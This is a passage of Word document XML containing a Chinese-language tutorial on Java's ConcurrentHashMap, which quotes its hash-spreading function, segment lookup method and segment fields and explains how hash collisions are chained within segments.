                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）</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6E1F5C">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这是重新</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的算法，还比较复杂，我也懒得去理解了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>private</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static</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> hash(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> h) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// Spread bits to regularize both segment and index locations,</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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// using variant of single-word Wang/Jenkins hash.</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h += (h &lt;&lt;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) ^ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0xffffcd7d</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h ^= (h &gt;&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>10</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h += (h &lt;&lt;   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>3</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h ^= (h &gt;&gt;&gt;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>6</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h += (h &lt;&lt;   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) + (h &lt;&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>14</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> h ^ (h &gt;&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>16</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这是定位段的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Segment&lt;K,V&gt; segmentFor(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> hash) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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lastRenderedPageBreak/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> segments[(hash &gt;&gt;&gt; segmentShift) &amp; segmentMask];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00573A3A">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据结构</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关于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表的基础数据结构，这里不想做过多的探讨。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表的一个很重要方面就是如何解决</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>冲突，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>使用相同的方式，都是将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值相同的节点放在一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链中。与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>不同的是，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>使用多个子</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表，也就是段</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(Segment)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。下面是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的数据成员：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>public</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> ConcurrentHashMap&lt;K, V&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> AbstractMap&lt;K, V&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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implements</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> ConcurrentMap&lt;K, V&gt;, Serializable {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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7"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>     * Mask value for indexing into segments. The upper bits of a</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7"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>     * key's hash code are used to choose the segment.</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7"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>     */</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7"/>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final</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> segmentMask;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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7"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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7"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>     * Shift value for indexing within segments.</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7"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>     */</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7"/>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final</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> segmentShift;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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7"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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7"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>     * The segments, each of which is a specialized hash table</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7"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>     */</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7"/>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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Segment&lt;K,V&gt;[] segments;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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所有的成员都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segmentMask</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segmentShift</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>主要是为了定位段，参见上面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segmentFor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
